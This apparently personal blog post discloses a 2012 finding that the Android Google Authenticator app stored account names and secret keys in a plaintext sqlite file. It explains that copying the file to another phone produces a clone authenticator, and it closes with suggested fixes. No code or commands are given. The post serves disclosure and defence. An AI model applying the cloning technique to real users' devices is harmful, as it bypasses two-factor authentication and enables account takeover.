[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)
I found out a security issue at the Google authenticator in May, 2012. I sent a paper about the details of issue to Google security team, but, I didn’t get a response from them. The authenticator was applied upgrade last year, however, I have no idea whether or not the issue was changed. Anyway I post it before dumping it a behind of memory.
Google provides the 2-step verification to make their service more secure. A user can install and use the Google’s OTP(One Time Passwords) app on their Smartphone. But, I have analyzed a authenticator on Android, I figure out a security issue that can be used to make a clone authenticator on another Smartphone.
When a user try to register their Smartphone to use the authenticator, a user have to input their account and, key or scan QR code. And then, the authenticator it starting to create one time password. Now a user can authenticate with Google services through a one time credential.
< Add account >
The authenticator provides two selections to be initialized, ‘Scan bar-code’ and ‘Manually add account’. But if you choose anything, account and key are stored in a file. But the problem is that the user account and key are stored in a file as a plaintext
Stored file is sqlite and the file path is
As you can see the below, the email field is a user account and the secret field is a key for the authenticator. The secret are looks encrypted, but it’s not a matter to make a clone authenticator.
< An example of stored key and secret >
If the file is copied or secrets and keys are duplicated into the another Smartphone’ authenticator, now we have a clone authenticator. The duplicated authenticators are creating a same one time password at the same time, and it can be used to authenticate the Google’s services.
I checked that the authenticator is verifying the device with phone number, Serial or IMEI, but device verification were not applied and it’s not affected the authenticator.
< The clone OTP >
The suggestions for this issue
- Encrypt account and key files
- Verify a device when the app executed to check it is a valid device or not or include a device serial into the one time password creation process
- Using more secure space like SIM, Turst Zone to prevent from the malicious access(In Korea, OTP apps for banks and financial sector are stored and executed in the SIM card)